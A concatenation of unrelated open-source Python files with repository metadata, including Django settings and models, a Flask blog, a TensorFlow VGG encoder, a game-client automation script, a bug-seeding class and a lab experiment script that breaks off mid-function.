https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'qmu#byqt%9+-s!lgnykjya)494-r(bw_a1*=2ae)^n@9m-o@d5'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'profiles',
'posts',
'users',
'crispy_forms',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'blogify.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'blogify.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
CRISPY_TEMPLATE_PACK = 'bootstrap4'
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'static_project')
]
STATIC_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_cdn", "static_root")
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(os.path.dirname(BASE_DIR), "static_cdn", "media_root")
LOGIN_URL = 'users-login'
|
[
"thomsontkd1@gmail.com"
] |
thomsontkd1@gmail.com
|
e017bc2e2567077ac2bfdb3a42079d3e0e32bf69
|
c76d7277493f28ab3f7dc505c38fbcc7d203317e
|
/cv/segmentation/1.segnet/networks/vggnet.py
|
9e9825d6e8b1ddec9da5a320a915997412dfe88f
|
[] |
no_license
|
niuxinzan/tf20_dl
|
4c351a9b77bc14cfb8368ae6bf83e4e8d7296717
|
7792aad655f77717bca4161a5053b51769427453
|
refs/heads/master
| 2023-01-08T11:19:18.408708
| 2020-11-09T07:02:43
| 2020-11-09T07:02:43
| 305,016,171
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,232
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Authon :buf
# @Email :niuxinzan@cennavi.com.cn
# @File :vggnet.py
# Created by iFantastic on 2020/10/21
import tensorflow as tf
from tensorflow.keras import models,layers,activations
def vggnet_encoder(input_height=416,input_width=416,pretrained='imagenet'):
img_input = tf.keras.Input(shape=(input_height,input_width,3))
# 416,416,3 -> 208,208,64
x = layers.Conv2D(filters=64,kernel_size=3,padding='same',name='block1_conv1')(img_input)
x = layers.Conv2D(filters=64,kernel_size=3,padding='same',name='block1_conv2')(x)
x = layers.MaxPooling2D(pool_size=(2,2),strides=(2,2),name='block1_pool')(x)
f1 = x
# 208,208,64 -> 128,128,128
x = layers.Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv1')(x)
x = layers.Conv2D(128, (3, 3), activation='relu', padding='same', name='block2_conv2')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block2_pool')(x)
f2 = x
# 104,104,128 -> 52,52,256
x = layers.Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv1')(x)
x = layers.Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv2')(x)
x = layers.Conv2D(256, (3, 3), activation='relu', padding='same', name='block3_conv3')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block3_pool')(x)
f3 = x
# 52,52,256 -> 26,26,512
x = layers.Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv1')(x)
x = layers.Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv2')(x)
x = layers.Conv2D(512, (3, 3), activation='relu', padding='same', name='block4_conv3')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block4_pool')(x)
f4 = x
# 26,26,512 -> 13,13,512
x = layers.Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv1')(x)
x = layers.Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv2')(x)
x = layers.Conv2D(512, (3, 3), activation='relu', padding='same', name='block5_conv3')(x)
x = layers.MaxPooling2D((2, 2), strides=(2, 2), name='block5_pool')(x)
f5 = x
return img_input, [f1, f2, f3, f4, f5]
|
[
"nxz0507@163.com"
] |
nxz0507@163.com
|
3169bd2cc3aa5831d52caff6abf1dd7a2a62c3f7
|
40442e8c450bb1cda86bc7c5792f66a8f9fe9863
|
/ProjectSurveillance/migrations/0009_detailtype_drive.py
|
8f523a26866091728db2a19a1eb7e507980f34a0
|
[
"MIT"
] |
permissive
|
psymen145/OVS-django-fe
|
f74620a40ef4245033e0b13370ba90e3509e2191
|
1823e8b42c17276d6b50a63dddd9b04a21c2038c
|
refs/heads/master
| 2021-09-02T01:10:51.008215
| 2017-12-29T15:06:26
| 2017-12-29T15:06:26
| 115,728,436
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 504
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-11-21 16:46
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ProjectSurveillance', '0008_projectactivity_rowcreation'),
]
operations = [
migrations.AddField(
model_name='detailtype',
name='drive',
field=models.NullBooleanField(db_column='Drive'),
),
]
|
[
"noreply@github.com"
] |
noreply@github.com
|
57c861cd16af96f077cd25db431a46f4feb6d0b2
|
c30d4f174a28aac495463f44b496811ee0c21265
|
/python/helpers/python-skeletons/multiprocessing/__init__.py
|
de9d1ddfa3ca0c043f71519ec442d5c291506ae8
|
[
"Apache-2.0"
] |
permissive
|
sarvex/intellij-community
|
cbbf08642231783c5b46ef2d55a29441341a03b3
|
8b8c21f445550bd72662e159ae715e9d944ba140
|
refs/heads/master
| 2023-05-14T14:32:51.014859
| 2023-05-01T06:59:21
| 2023-05-01T06:59:21
| 32,571,446
| 0
| 0
|
Apache-2.0
| 2023-05-01T06:59:22
| 2015-03-20T08:16:17
|
Java
|
UTF-8
|
Python
| false
| false
| 4,217
|
py
|
"""Skeleton for 'multiprocessing' stdlib module."""
from multiprocessing.pool import Pool
class Process(object):
def __init__(self, group=None, target=None, name=None, args=(), kwargs={}):
self.name = ''
self.daemon = False
self.authkey = None
self.exitcode = None
self.ident = 0
self.pid = 0
self.sentinel = None
def run(self):
pass
def start(self):
pass
def terminate(self):
pass
def join(self, timeout=None):
pass
def is_alive(self):
return False
class ProcessError(Exception):
pass
class BufferTooShort(ProcessError):
pass
class AuthenticationError(ProcessError):
pass
class TimeoutError(ProcessError):
pass
class Connection(object):
def send(self, obj):
pass
def recv(self):
pass
def fileno(self):
return 0
def close(self):
pass
def poll(self, timeout=None):
pass
def send_bytes(self, buffer, offset=-1, size=-1):
pass
def recv_bytes(self, maxlength=-1):
pass
def recv_bytes_into(self, buffer, offset=-1):
pass
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def Pipe(duplex=True):
return Connection(), Connection()
class Queue(object):
def __init__(self, maxsize=-1):
self._maxsize = maxsize
def qsize(self):
return 0
def empty(self):
return False
def full(self):
return False
def put(self, obj, block=True, timeout=None):
pass
def put_nowait(self, obj):
pass
def get(self, block=True, timeout=None):
pass
def get_nowait(self):
pass
def close(self):
pass
def join_thread(self):
pass
def cancel_join_thread(self):
pass
class SimpleQueue(object):
def empty(self):
return False
def get(self):
pass
def put(self, item):
pass
class JoinableQueue(multiprocessing.Queue):
def task_done(self):
pass
def join(self):
pass
def active_childern():
"""
:rtype: list[multiprocessing.Process]
"""
return []
def cpu_count():
return 0
def current_process():
"""
:rtype: multiprocessing.Process
"""
return Process()
def freeze_support():
pass
def get_all_start_methods():
return []
def get_context(method=None):
pass
def get_start_method(allow_none=False):
pass
def set_executable(path):
pass
def set_start_method(method):
pass
class Barrier(object):
def __init__(self, parties, action=None, timeout=None):
self.parties = parties
self.n_waiting = 0
self.broken = False
def wait(self, timeout=None):
pass
def reset(self):
pass
def abort(self):
pass
class Semaphore(object):
def __init__(self, value=1):
pass
def acquire(self, blocking=True, timeout=None):
pass
def release(self):
pass
class BoundedSemaphore(multiprocessing.Semaphore):
pass
class Condition(object):
def __init__(self, lock=None):
pass
def acquire(self, *args):
pass
def release(self):
pass
def wait(self, timeout=None):
pass
def wait_for(self, predicate, timeout=None):
pass
def notify(self, n=1):
pass
def notify_all(self):
pass
class Event(object):
def is_set(self):
return False
def set(self):
pass
def clear(self):
pass
def wait(self, timeout=None):
pass
class Lock(object):
def acquire(self, blocking=True, timeout=-1):
pass
def release(self):
pass
class RLock(object):
def acquire(self, blocking=True, timeout=-1):
pass
def release(self):
pass
def __enter__(self):
pass
def __exit__(self, exc_type, exc_val, exc_tb):
pass
def Value(typecode_or_type, *args, **kwargs):
pass
def Array(typecode_or_type, size_or_initializer, lock=True):
pass
def Manager():
return multiprocessing.SyncManager()
|
[
"andrey.vlasovskikh@jetbrains.com"
] |
andrey.vlasovskikh@jetbrains.com
|
2e12579543198362bbc5700bcf87a57054c877db
|
fb87f29a2cc1997b38943191a416cc32ba095f6d
|
/doc.py
|
b66347cb1de430daca2a52196f407489a0ae3f72
|
[] |
no_license
|
Lludion/QGOL
|
05a6e58c69085ec89a09a2d482fce96eded70ec5
|
03b902a2fb2334a008b2ec840f094cf71b372f0d
|
refs/heads/main
| 2023-01-08T21:50:25.577876
| 2020-11-11T10:46:42
| 2020-11-11T10:50:06
| 303,635,962
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 51
|
py
|
from doc.documentation_creator import main
main()
|
[
"ulysse.remond@outlook.fr"
] |
ulysse.remond@outlook.fr
|
401300d2f39d7307cb7f691dce9ee2bd2a9ffa97
|
1c5321bf1d26e9c63add1c951ca283571188dfb2
|
/lol.py
|
a6dd3084aa5d338299317ab75b1ab7241c48ff84
|
[] |
no_license
|
CryNando/BOTCreateCustomMatchLOL
|
e5c015dc40b7e784c5daff09baea711f7b904e64
|
2310a40c949b74955f0c956f5c589549caaec731
|
refs/heads/master
| 2020-03-20T19:03:11.610256
| 2018-06-17T00:28:44
| 2018-06-17T00:28:44
| 137,618,724
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,225
|
py
|
# encoding: utf-8
import os
import time
import pyautogui
os.startfile(r"C:\Riot Games\League of Legends\LeagueClient.exe")
print ("Aguardando tela de Login")
time.sleep(20)
print("Colocando Usuário")
pyautogui.click(1033,229, duration=1.00) #posição Username
pyautogui.typewrite('seuusuario', 0.25)
time.sleep(1)
print("Colocando Senha")
pyautogui.click(1033,271, duration=1.00) #posicao password
pyautogui.typewrite('suasenha', 0.25)
time.sleep(1)
print ("Clicando em Iniciar Sessão")
pyautogui.click(1102,521, duration=1.00) #posicao password
print("Aguardando Jogo Abrir")
time.sleep(60)
print ("Clicando em Jogar ")
pyautogui.click(269,109, duration=1.00)
time.sleep(1)
print "Selecionando Modo Personalizado"
pyautogui.click(555,159, duration=1.00)
print "Selecionando Modo Alternando"
pyautogui.click(771,440, duration=1.00)
print "Confirmando Partida"
pyautogui.click(594,621, duration=1.00)
time.sleep(5)
print "Adicionando Bot 1"
pyautogui.click(920,264, duration=1.00)
time.sleep(1)
print "Adicionando Bot 2"
pyautogui.click(909,305, duration=1.00)
time.sleep(1)
print "Adicionando Bot 3"
pyautogui.click(915,351, duration=1.00)
time.sleep(1)
print "Adicionando Bot 4"
pyautogui.click(925,382, duration=1.00)
print "Adicionando Bot 5"
pyautogui.click(916,418, duration=1.00)
time.sleep(1)
print("Clicando em Inicar")
pyautogui.click(620,628, duration=1.00)
time.sleep(10)
print ("Banindo primeiro Campeão")
pyautogui.click(828,158, duration=1.00)
pyautogui.typewrite('LeBlanc', 0.25)
time.sleep(1)
pyautogui.click(484,196, duration=1.00)
pyautogui.click(686,565, duration=1.00)
time.sleep(2)
print ("Banindo segundo Campeão")
pyautogui.click(828,158, duration=1.00)
pyautogui.typewrite('Ahri', 0.25)
pyautogui.click(484,196, duration=1.00)
pyautogui.click(686,565, duration=1.00)
time.sleep(2)
print ("Banindo terceiro Campeão")
pyautogui.click(828,158, duration=1.00)
pyautogui.typewrite('Nocturne', 0.25)
pyautogui.click(484,196, duration=1.00)
pyautogui.click(686,565, duration=1.00)
time.sleep(2)
print ("Selecionando seu Campeão")
pyautogui.click(828,158, duration=1.00)
pyautogui.typewrite('Rengar', 0.25)
pyautogui.click(484,196, duration=1.00)
time.sleep(1)
pyautogui.click(686,565, duration=1.00)
|
[
"crynando@outlook.com"
] |
crynando@outlook.com
|
269e711a13c5b31a03861276ace784b6574ce8fc
|
626c4e5c797e943ffa1a31560b929f3646963c6a
|
/bluelog/blueprints/blog.py
|
c0c1ee564b5e1cd5cf8aaa01cddc68c6f9319048
|
[] |
no_license
|
BrightHsu/Myblog
|
b53543363205c104b017ab6b2c0d2ef232fbecde
|
73b2d7f926683b18da4fe505de0205de488782b6
|
refs/heads/master
| 2023-03-27T22:21:48.583778
| 2020-06-12T02:13:42
| 2020-06-12T02:13:42
| 270,941,342
| 0
| 0
| null | 2021-03-20T04:27:26
| 2020-06-09T08:08:16
|
JavaScript
|
UTF-8
|
Python
| false
| false
| 5,368
|
py
|
#!/usr/bin/python3
# -*- coding: utf-8 -*-
"""
@Time : 2020/6/1 11:42
@Author : David Ben
@FileName: __init__.py.py
@Email: hsudavid@163.com
@Software: PyCharm
"""
from flask import Blueprint, render_template, flash, redirect, url_for, request, make_response
from flask import current_app
from bluelog.models import Post, Comment, Reply, Category
from bluelog.utils import redirect_back
from bluelog.forms import CommentForm, AdminCommentForm
from flask_login import current_user
from bluelog.extensions import db
from bluelog.emails import send_new_comment_email, send_new_reply_email
blog_bp = Blueprint('blog', __name__)
@blog_bp.route('/')
def index():
page = request.args.get('page', 1, type=int)
per_page = current_app.config['BLUELOG_POST_PER_PAGE']
pagination = Post.query.order_by(
Post.timestamp.desc()).paginate(
page, per_page)
posts = pagination.items
return render_template(
'blog/index.html',
pagination=pagination,
posts=posts)
@blog_bp.route('/about')
def about():
return render_template('blog/about.html')
@blog_bp.route('/change/<path:theme>')
def change_theme(theme):
response = make_response(redirect_back())
response.set_cookie('theme', theme, max_age=30 * 24 * 60 * 60)
return response
@blog_bp.route('/show/post/<int:post_id>', methods=['GET', 'POST'])
def show_post(post_id):
post = Post.query.get_or_404(post_id)
page = request.args.get('page', 1, type=int)
per_page = current_app.config['BLUELOG_COMMENT_PRE_PAGE']
pagination = Comment.query.with_parent(post).filter_by(
reviewed=True) .order_by(
Comment.timestamp.asc()).paginate(
page=page,
per_page=per_page)
comments = pagination.items
if current_user.is_authenticated:
form = AdminCommentForm()
form.name.data = current_user.name
form.email.data = current_app.config['BLUELOG_EMAIL']
form.site.data = url_for('.index')
reviewed = True
from_admin = True
else:
form = CommentForm()
reviewed = False
from_admin = False
if form.validate_on_submit():
author = form.name.data
email = form.email.data
site = form.site.data
body = form.comment.data
comment = Comment(
author=author,
email=email,
site=site,
body=body,
reviewed=reviewed,
from_admin=from_admin,
post=post)
db.session.add(comment)
db.session.commit()
if current_user.is_authenticated:
flash('您的评论已发送', 'success')
else:
flash('感谢您的评论, 该评论需要通过审核后才能显示', 'info')
send_new_comment_email(post) # 发送提醒邮件给管理员
return redirect(url_for('.show_post', post_id=post.id))
return render_template(
'blog/post.html',
post=post,
comments=comments,
pagination=pagination,
form=form)
@blog_bp.route('/reply/form/<int:comment_id>', methods=['POST'])
def reply_form(comment_id):
comment = Comment.query.get_or_404(comment_id)
if current_user.is_authenticated:
form = AdminCommentForm()
form.name.data = current_user.name
form.email.data = current_app.config['BLUELOG_EMAIL']
form.site.data = url_for('.index')
# reviewed = True
from_admin = True
else:
form = CommentForm()
# reviewed = False
from_admin = False
if form.validate_on_submit():
author = form.name.data
email = form.email.data
site = form.site.data
body = form.comment.data
reply = Reply(author=author, email=email, site=site, body=body, from_admin=from_admin,
comment=comment)
db.session.add(reply)
db.session.commit()
flash('您的评论已发送', 'success')
send_new_reply_email(comment) # 发送提醒邮件给评论人
return redirect(url_for('.show_post', post_id=comment.post_id))
return redirect_back()
@blog_bp.route('/show/category/<int:category_id>')
def show_category(category_id):
category = Category.query.get_or_404(category_id)
page = request.args.get('page', 1, type=int)
per_page = current_app.config['BLUELOG_POST_PER_PAGE']
pagination = Post.query.with_parent(category).order_by(
Post.timestamp.desc()).paginate(
page=page, per_page=per_page)
posts = pagination.items
return render_template(
'blog/category.html',
category=category,
pagination=pagination,
posts=posts)
@blog_bp.route('/reply/comment/<int:comment_id>')
def reply_comment(comment_id):
comment = Comment.query.get_or_404(comment_id)
r_id = request.args.get('next')
page = request.args.get('page')
if not comment.post.can_comment:
flash('评论已关闭, 无法进行评论', 'warning')
return redirect(url_for('.show_post', post_id=comment.post.id))
return redirect(
url_for(
'.show_post',
post_id=comment.post_id,
reply=comment_id,
author=comment.author,
r_id=r_id,
page=page,
admin=comment.from_admin) +
'#comment-form')
|
[
"hsudavid@163.com"
] |
hsudavid@163.com
|
7cae39a80777cd2319715cb741204ebda891e051
|
3d1297a6c2c16f51dc43130d85daf1e32edefa14
|
/main/views.py
|
bfdba79954465c8d279a8324fb176db88b271c34
|
[] |
no_license
|
Nissel21/linioexp
|
bf6cef97ba75b37db5ebe7dee7f64e3ce6ba747d
|
e66ef8a30d9ee7d4ae236fbdf033840380c2e6a5
|
refs/heads/master
| 2022-12-30T03:00:59.973262
| 2020-09-23T06:03:44
| 2020-09-23T06:03:44
| 297,853,999
| 1
| 0
| null | 2020-10-05T06:38:33
| 2020-09-23T04:39:45
|
Python
|
UTF-8
|
Python
| false
| false
| 400
|
py
|
from django.shortcuts import render
from django.http import HttpResponse
from django.views.generic import ListView, DetailView
from .models import Producto
# Create your views here.
def home(request):
return HttpResponse("Hola, te encuentras en la página de inicio del Linio Express")
class ProductListView(ListView):
model = Producto
class ProductDetailView(DetailView):
model = Producto
|
[
"71747645+Nissel21@users.noreply.github.com"
] |
71747645+Nissel21@users.noreply.github.com
|
aee870e083624fa9410fb6c88a23bfa18a7fa8c8
|
31bfebbc0739bf8e81fb63b1fc35dab45c1aee8c
|
/bug_seeding/bug_seeding_approaches/SeedBugs.py
|
a5b1525f267786c4678522c245d816d571eb3078
|
[
"MIT"
] |
permissive
|
mxmws/SemSeed
|
85527f1c4c1b80dce38c2687e6b725967c287484
|
278bf1ae3bb371bbe98965556d1fbb3a38b8c6f5
|
refs/heads/main
| 2023-06-03T06:04:17.966491
| 2021-06-17T17:40:39
| 2021-06-17T17:40:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,595
|
py
|
"""
Created on 24-March-2020
@author Jibesh Patra
"""
from abc import ABC, abstractmethod
from typing import List, Tuple
class SeedBugs(ABC):
def __init__(self, bug_seeding_pattern: dict, target_location: dict, file_path: str):
# Stuffs about the bug. Eg. Buggy, Correct, Surrounding tokens, Usages Identifiers, Literals etc.
self.bug_metadata = {
'file_name_where_intended': file_path,
"target_token_sequence-Correct": target_location['tokens'], # Abstract token sequence that will be mutated
"target_token_sequence-Buggy": [], # Concrete token sequence generated after mutation
"token_sequence_abstraction-Correct": target_location['abstractedTokens'],
"token_sequence_abstraction-Buggy": [],
"target_line_range": {'line': target_location['line'], 'range': target_location['range']},
"num_of_available_identifiers_to_choose_from": 0,
"num_of_available_literals_to_choose_from": 0,
"error": False
}
self.bug_seeding_pattern = bug_seeding_pattern
self.target_location = target_location
@abstractmethod
def is_matching_token_sequence(self) -> bool:
"""
For a 'syntactic' match check, this will return True if the
token sequence in abstracted form match.
For a 'semantic' matching this will depend on the cosine distance of the
embedding of the tokens along with the threshold.
:return:
"""
raise NotImplementedError
@abstractmethod
def apply_pattern(self) -> List[List]:
"""
Seed a bug by applying a given pattern
:return:
"""
raise NotImplementedError
def extract_tokens_of_kinds(self, given_token_seq: List[str]) -> Tuple[List, List, List]:
try:
assert len(given_token_seq) == len(self.target_location['abstractedTokens'])
except AssertionError as e:
print("The lengths of these token sequences should be same")
tokens = []
idf_tokens = []
lit_tokens = []
idf_prefix = 'Idf_'
lit_prefix = 'Lit_'
for i, abs_tok in enumerate(self.target_location['abstractedTokens']):
concrete_token = given_token_seq[i]
if abs_tok.startswith(idf_prefix) or abs_tok.startswith(lit_prefix):
tokens.append(concrete_token)
if abs_tok.startswith(idf_prefix):
idf_tokens.append(concrete_token)
elif abs_tok.startswith(lit_prefix):
lit_tokens.append(concrete_token)
return tokens, idf_tokens, lit_tokens
def replace_target_with_mutated_token_sequence(self, token_list: List, token_range_list: List,
mutated_token_sequence: List) -> List:
"""
Once the mutated token sequence has been found replace the target token sequence with this new
:param token_list: The complete list of the token in the file
:param token_range_list: The ranges of each token contained in the token list
:param mutated_token_sequence: The token sequence that will be inserted to seed bugs
:return: Token sequence after seeding the bug
"""
assert len(token_list) == len(token_range_list)
start_range = self.target_location["range"][0]
end_range = self.target_location["range"][1]
indices_to_remove = [i for i, rng in enumerate(token_range_list) if int(rng.split(
'-')[0]) >= start_range and int(rng.split('-')[1]) <= end_range]
part1 = token_list[:indices_to_remove[0]]
part2 = token_list[indices_to_remove[-1] + 1:]
token_list_after_seeding = part1 + mutated_token_sequence + part2
assert len(token_list_after_seeding) == len(token_list) - len(self.target_location['tokens']) + len(
mutated_token_sequence)
return token_list_after_seeding
def get_abstract_token_to_concrete_mapping(self) -> dict:
"""
This creates a mapping of the abstract token to its actual value
Eg. 'Idf_1' -> 'a'
"""
mappings = {}
for i, abstract_tok in enumerate(self.target_location['abstractedTokens']):
if not abstract_tok.startswith('Idf_') and not abstract_tok.startswith('Lit_'):
continue
mappings[abstract_tok] = self.target_location['tokens'][i]
return mappings
def write_bug_seeded_file(self):
pass
def __call__(self, *args, **kwargs):
pass
|
[
"jibesh@Jibeshs-MacBook-Pro.local"
] |
jibesh@Jibeshs-MacBook-Pro.local
|
d45a656414a1df2c05be824ff7ff20650f0968ee
|
b624f0d085642618a3935e0888e9a53a17c8361c
|
/tms/tmsapp/models.py
|
04c35de188f04f1a65eac39a20a297115eb97a98
|
[] |
no_license
|
Alton1998/TMS-APP
|
1df685671127980e72ffa6ab2ab95a848a4c358c
|
828dac35b55028bc77da5818ed501b03272932ab
|
refs/heads/master
| 2020-03-23T02:00:41.965194
| 2018-07-16T15:30:04
| 2018-07-16T15:30:04
| 140,950,992
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 824
|
py
|
from django.db import models
# Creating models
class trafficAtA(models.Model):
Trafficdensity=models.FloatField()
time=models.TimeField(auto_now_add=True)
def __str__(self):
return self.Trafficdensity,self.time
class trafficAtB(models.Model):
Trafficdensity = models.FloatField()
time = models.TimeField(auto_now_add=True)
def __str__(self):
return self.Trafficdensity,self.time
class trafficAtC(models.Model):
Trafficdensity = models.FloatField()
time = models.TimeField(auto_now_add=True)
def __str__(self):
return self.Trafficdensity,self.time
class trafficAtD(models.Model):
Trafficdensity = models.FloatField()
time = models.TimeField(auto_now_add=True,)
def __str__(self):
return self.Trafficdensity,self.time
|
[
"noreply@github.com"
] |
noreply@github.com
|
4e3e8013222191f5557eeefbb7ca5e65131aeece
|
aebc347ff9a8ad739111f13aa8d4cf9d48a1e4bd
|
/data/170818/170818_074301_spectral_scan/0019_electron_loading_trap_studies_E5071C.py
|
b1d29626c5ebe7e0216866f17a237346e2a494bb
|
[] |
no_license
|
geyang/170422_EonHe_M018V6
|
f01a60d3b8a911ba815a0fcc0bf1b6e2aa8f5f17
|
ce189e22f99942e46fce84a0dca714888e44bc69
|
refs/heads/master
| 2021-06-22T21:01:23.257239
| 2017-08-25T09:48:17
| 2017-08-25T09:48:17
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 10,239
|
py
|
from data_cache import dataCacheProxy
from time import sleep, time, strftime
from setup_instruments import fridge, seekat, yoko1, nwa, filament
from resonance_fitting import fit_res_gerwin
import numpy as np
import matplotlib.pyplot as plt
from tqdm import tqdm
import os
from shutil import copyfile
import quicktimetrace_4D as fastsweep
this_script = r"0019_electron_loading_trap_studies_E5071C.py"
expt = 'spectral_scan'
#res = seekat
t0 = time()
if __name__ == "__main__":
today = strftime("%y%m%d")
now = strftime("%H%M%S")
expt_path = os.path.join(r'S:\_Data\170422 - EonHe M018V6 with L3 etch\data', today, "%s_electron_loading_2D_resg_trap" % now)
print "Saving data in %s" % expt_path
if not os.path.isdir(expt_path):
os.makedirs(expt_path)
sleep(1)
copyfile(os.path.join(r"S:\_Data\170422 - EonHe M018V6 with L3 etch\experiment", this_script),
os.path.join(expt_path, this_script))
dataCache = dataCacheProxy(file_path=os.path.join(expt_path, os.path.split(expt_path)[1] + ".h5"))
prefix = "electron_loading"
fridgeParams = {'wait_for_temp': 0.080,
'min_temp_wait_time': 60}
filamentParams = {"amplitude": 4.2,
"offset": -0.5,
"frequency": 113e3,
"duration": 40e-3}
pulseParams = {"delay": .00,
"pulses": 200}
def set_voltages(res, trap, res_guard, trap_guard, pinch=None, verbose=True):
if res is not None:
seekat.set_voltage(1, res, verbose=verbose)
if trap is not None:
seekat.set_voltage(2, trap, verbose=verbose)
if res_guard is not None:
seekat.set_voltage(3, res_guard, verbose=verbose)
if trap_guard is not None:
seekat.set_voltage(4, trap_guard, verbose=verbose)
if pinch is not None:
seekat.set_voltage(5, pinch, verbose=verbose)
dataCache.post("voltage_log", np.array([time(),
seekat.get_voltage(1), seekat.get_voltage(2),
seekat.get_voltage(3), seekat.get_voltage(4),
seekat.get_voltage(5)]))
def get_voltages():
return seekat.get_voltage(1), seekat.get_voltage(2), seekat.get_voltage(3), \
seekat.get_voltage(4), seekat.get_voltage(5)
filament.setup_driver(**filamentParams)
filament.set_timeout(10000)
print filament.get_id()
def unload():
print "********************"
print "UNLOADING ELECTRONS!"
print "********************"
for k in range(5):
print "\tStep %d"%(k+1)
for volts in [-1, -2, -3, -4, -3, -2, -1]:
set_voltages(volts, volts, volts, volts, verbose=False)
sleep(0.5)
def unload_trap(start=-3.0, stop=-5.0):
print "********************"
print "UNLOADING TRAP ONLY!"
print "********************"
res_init, trap_init, res_guard_init, trap_guard_init, pinch = get_voltages()
vs = list(np.arange(start, stop, -1)) +\
list(np.arange(stop, start, +1))
for k in range(5):
print "\tStep %d"%(k+1)
for volts in vs:
set_voltages(res_init, volts, res_guard_init, trap_guard_init, verbose=False)
sleep(0.5)
set_voltages(res_init, trap_init, res_guard_init, trap_guard_init)
def take_trace_and_save(averages, do_fit=False):
temperature = fridge.get_mc_temperature()
dataCache.post('temperature', temperature)
Vres, Vtrap, Vrg, Vtg, Vpinch = get_voltages()
dataCache.post('Vres', Vres)
dataCache.post('Vtrap', Vtrap)
dataCache.post('Vpinch', Vpinch)
dataCache.post('Vrg', Vrg)
dataCache.post('Vtg', Vtg)
if averages > 1:
fpts, mags, phases = nwa.take_one_averaged_trace()
else:
fpts, mags, phases = nwa.take_one()
if do_fit:
fitspan = 2E6;
center_freq = fpts[np.argmax(mags)]
try:
fitres = dsfit.fitlor(fpts, dataanalysis.dBm_to_W(mags),
domain=[center_freq - fitspan / 2., center_freq + fitspan / 2.])
dataCache.post('f0', fitres[2])
except:
print "FIT FAILED!"
if np.max(mags) < -55:
print "WARNING: PEAK OUT OF RANGE!"
#else:
#nwa.set_center_frequency(fitres[2])
dataCache.post('fpts', fpts)
dataCache.post('mags', mags)
dataCache.post('phases', phases)
dataCache.post('time', time() - t0)
return temperature
def unload_with_filament():
# First loading to get rid of most electrons!
if load_electrons:
set_voltages(-3.0, -3.0, 0.0, 0.0)
sleep(2.0)
temperature = fridge.get_mc_temperature()
print "Waiting for consistent electron loading temperature of < 550 mK...."
while temperature > 0.550:
temperature = fridge.get_mc_temperature()
sleep(2)
print '.',
filament.fire_filament(100, 0.01)
print "Fired filament!"
sleep(60.0)
def load_resonator_not_trap():
print "\n"
print "********************"
print "LOADING ELECTRONS..."
print "********************"
set_voltages(2.0, -3.0, 0.0, 0.0)
sleep(2.0)
temperature = fridge.get_mc_temperature()
print "Waiting for consistent electron loading temperature of < 550 mK...."
while temperature > 0.550:
temperature = fridge.get_mc_temperature()
sleep(2)
print '.',
filament.fire_filament(100, 0.01)
print "Fired filament!"
sleep(60.0)
not_settled = True
stable_temp = 0.550
